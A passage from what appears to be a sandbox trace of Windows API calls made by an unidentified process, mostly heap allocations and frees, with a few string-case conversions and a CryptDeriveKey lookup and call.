Size=0x10) returned 0x34aa400 [0209.320] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.320] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.320] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0209.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0209.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0209.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0209.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0209.320] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0209.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0209.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0209.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.320] CryptHashData (hHash=0xaa5820, pbData=0x24b18e8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0209.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0209.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0209.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0209.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0209.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0209.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0209.321] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0209.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0209.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0209.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0209.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0209.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0209.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0209.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0209.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0209.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0209.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0209.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0209.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0209.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0209.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0209.322] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0209.322] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0209.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0209.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0209.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0209.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0209.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0209.322] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0209.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3d0 [0209.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0209.322] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.322] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0209.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0209.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0209.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0209.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.323] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0209.323] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0209.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0209.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0209.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0209.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0209.324] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0209.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0209.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.324] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.324] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0209.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0209.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0209.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0209.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.325] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0209.325] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0209.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0209.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0209.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0209.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0209.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0209.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0209.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0209.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0209.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.326] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0209.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0209.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0209.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0209.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0209.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0209.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0209.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0209.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0209.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0209.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0209.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa9e8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0209.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0209.328] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0209.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0209.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0209.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0209.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0209.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0209.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0209.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0209.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0209.329] CryptDeriveKey (in: hProv=0xad27a8, Algid=0x6601, hBaseData=0xaa5820, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58e0) returned 1 [0209.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0209.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0209.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0209.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0209.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0209.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0209.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0209.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0209.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0209.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0209.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0209.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0209.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0209.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0209.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0209.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0209.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0209.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0209.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0209.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0209.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0209.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0209.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0209.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0209.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0209.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0209.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0209.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0209.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0209.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0209.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0209.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0209.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0209.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0209.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.332] HeapFree 